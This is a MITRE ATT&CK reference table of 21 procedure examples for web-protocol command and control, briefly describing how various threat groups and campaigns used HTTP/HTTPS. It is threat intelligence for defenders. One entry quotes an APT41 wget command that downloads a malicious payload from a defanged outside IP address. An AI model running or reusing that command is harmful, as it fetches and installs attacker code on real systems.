Real-world descriptions of how a group, tool or campaign used a technique.
21 examples
| Technique | Used by | Procedure example |
|---|---|---|
| T1071.001 Web Protocols |
CampaignOperation Dream Job | During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers. |
| T1071.001 Web Protocols |
CampaignSharePoint ToolShell Exploitation | During SharePoint ToolShell Exploitation, threat actors issued HTTP `POST` requests to web shells with spoofed or empty Referrer headers, to circumvent authorization controls. |
| T1071.001 Web Protocols |
CampaignFrankenstein | During Frankenstein, the threat actors used HTTP GET requests for C2. |
| T1071.001 Web Protocols |
CampaignRedDelta Modified PlugX Infection Chain Operations | Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations. |
| T1071.001 Web Protocols |
CampaignOperation MidnightEclipse | During Operation MidnightEclipse, threat actors used `wget` via HTTP to retrieve payloads. |
| T1071.001 Web Protocols |
Campaign2015 Ukraine Electric Power Attack | During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests. |
| T1071.001 Web Protocols |
CampaignIndian Critical Infrastructure Intrusions | During Indian Critical Infrastructure Intrusions, RedEcho network activity included SSL traffic over TCP 443 and HTTP traffic over non-standard ports. |
| T1071.001 Web Protocols |
Campaign3CX Supply Chain Attack | During the 3CX Supply Chain Attack, AppleJeus's COLDCAT C2 leverages cookie headers to contain data over HTTPS. Cookies also contain hardcoded variables `__tutma` or `__tutmc` in the payload's HTTPS request. |
| T1071.001 Web Protocols |
CampaignC0018 | During C0018, the threat actors used HTTP for C2 communications. |
| T1071.001 Web Protocols |
CampaignC0021 | During C0021, the threat actors used HTTP for some of their C2 communications. |
| T1071.001 Web Protocols |
CampaignJuicy Mix | During Juicy Mix, OilRig used a VBS script to send POST requests to register installed malware with C2. |
| T1071.001 Web Protocols |
CampaignSolarWinds Compromise | During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration. |
| T1071.001 Web Protocols |
CampaignOperation CuckooBees | During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners. |
| T1071.001 Web Protocols |
CampaignOuter Space | During Outer Space, OilRig used HTTP to communicate between installed backdoors and compromised servers including via the Microsoft Exchange Web Services API. |
| T1071.001 Web Protocols |
CampaignArcaneDoor | ArcaneDoor command and control activity was conducted through HTTP. |
| T1071.001 Web Protocols |
CampaignAPT41 DUST | APT41 DUST used HTTPS for command and control. |
| T1071.001 Web Protocols |
CampaignNight Dragon | During Night Dragon, threat actors used HTTP for C2. |
| T1071.001 Web Protocols |
CampaignVersa Director Zero Day Exploitation | Versa Director Zero Day Exploitation established HTTPS communications from adversary-controlled SOHO devices over port 443 with compromised Versa Director servers. |
| T1071.001 Web Protocols |
CampaignOperation Wocao | During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS. |
| T1071.001 Web Protocols |
CampaignC0017 | During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads. |
| T1071.001 Web Protocols |
CampaignQuad7 Activity | Quad7 Activity has used the same User Agents of |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.